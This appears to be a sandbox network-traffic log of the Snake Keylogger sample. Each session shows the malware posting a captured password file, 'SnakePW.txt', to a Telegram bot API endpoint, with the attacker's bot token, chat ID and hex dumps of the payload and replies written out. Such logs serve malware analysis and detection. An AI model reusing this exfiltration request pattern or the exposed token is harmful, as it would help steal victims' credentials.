                            2022-06-26 07:33:56 UTC307OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 33 30 64 32 36 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757030d2640Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:57 UTC308INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:57 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:57 UTC308INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66952,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228837,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            183192.168.2.550045149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:57 UTC309OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570348c170
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:57 UTC309OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 33 34 38 63 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570348c170Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:57 UTC309INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:57 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:57 UTC310INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66954,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228837,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            184192.168.2.550047149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:57 UTC310OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570386be2e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:57 UTC311OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 33 38 36 62 65 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570386be2eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:57 UTC311INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:57 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:57 UTC311INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66955,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228837,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            185192.168.2.550050149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:58 UTC312OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575703c4bbbe
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:58 UTC312OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 33 63 34 62 62 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575703c4bbbeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:58 UTC313INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:58 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:58 UTC313INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66956,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228838,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            186192.168.2.550051149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:58 UTC314OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757040055f7
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:58 UTC314OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 30 30 35 35 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757040055f7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:58 UTC314INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:58 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:58 UTC315INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66957,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228838,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            187192.168.2.550054149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:58 UTC315OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575704372bc8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:58 UTC316OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 33 37 32 62 63 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575704372bc8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:59 UTC316INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:59 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:59 UTC316INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66958,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228839,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            188192.168.2.550056149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:59 UTC317OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570472c8bd
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:59 UTC317OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 37 32 63 38 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570472c8bdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:59 UTC318INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:59 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:59 UTC318INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66959,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228839,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            189192.168.2.550059149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:59 UTC319OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575704a99d5f
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:59 UTC319OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 61 39 39 64 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575704a99d5fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:59 UTC319INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
